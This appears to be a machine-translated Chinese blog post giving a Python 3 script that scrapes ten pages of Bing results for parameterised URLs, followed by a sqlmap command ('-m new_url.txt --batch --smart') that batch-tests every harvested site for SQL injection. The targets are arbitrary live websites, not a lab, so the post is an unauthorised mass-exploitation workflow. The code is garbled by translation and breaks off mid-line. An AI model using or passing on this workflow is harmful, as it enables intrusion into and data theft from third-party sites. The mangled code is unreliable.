Injection has always been using sqlmap to lead to an otherwise less proficient manual injection now forget it all
Want to practice but for a while and can not find an injection of the site so there is this article
I want to find a tool to get the domain name link in bulk, but it's just getting the domain name and not getting back the parameters.
So I wrote a
Get only the results of the previous 10 pages of Bing enter Q to end the loop and start organizing the data
#!/usr/bin/env python#-*-conding:utf-8-*-import reimport Urllib.request,urllib.parselogo = ' _______ ___ ___ _ |__ __| / _ \ / _ \ | | | | | | | | | | | | | | ___ | | | | | | | | | | | | / __| | | | |_| | | |_| | | | \__ \ |_| \___/\___/|_| |___/"Print (logo) def obtain_url (): #爬抓bing获取url page = [' ', ' &first=11&form=pere ', ' &f Irst=21&form=pere1 ', ' &first=31&form=pere2 ', ' &first=41&form=pere3 ', ' &first=51&FOR M=pere4 ', ' &first=61&form=pere5 ', ' &first=71&form=pere6 ', ' &first=81&form=pere7 ', ' & ; First=91&form=pere8 '] headers = {' user-agent ': R ' mozilla/5.0 (Windows NT 6.1; WOW64) applewebkit/537.36 (khtml, like Gecko) ' R ' chrome/45.0.2454.85 safari/537.36 115browser/6.0.3 ' , ' Referer ': R ' http://www.baidu.com ', ' Connection ': ' keep-alive '} while True: #一直循环输入关键字 Crux = INPUT (' Please enter keyword: ') if crux = = ' Q ': #判断关键字是否为q is on end loop break crux = Urllib.parse.quote (Crux) #解决编码报错问 Title with open (' Url.txt ', ' a ', encoding= ' Utf-8 ') as f:for i in page:content = Urllib.reque St. Request (' https://cn.bing.com/search?q= ' +crux+i,headers=headers) contents = urllib.request.urlopen (content). Read (). Decode (' utf-8 ') res = Re.compile (R '
Input Q
End loop and start processing data
Url.txt is crawling the linked data
New_url.txt is the processed data
Copy new_url.txt to Sqlmap root directory
sqlmap.py -m new_url.txt --batch --smart
-M is a batch injection with New_url.txt inside--batch automatically select--smart Fast injection
The results of the injection are under the C:\Users\Administrator\.sqlmap\output file
In a file like Results-04242018_0624pm.csv
Batch Find injection PYTHON3+SQLMAP combination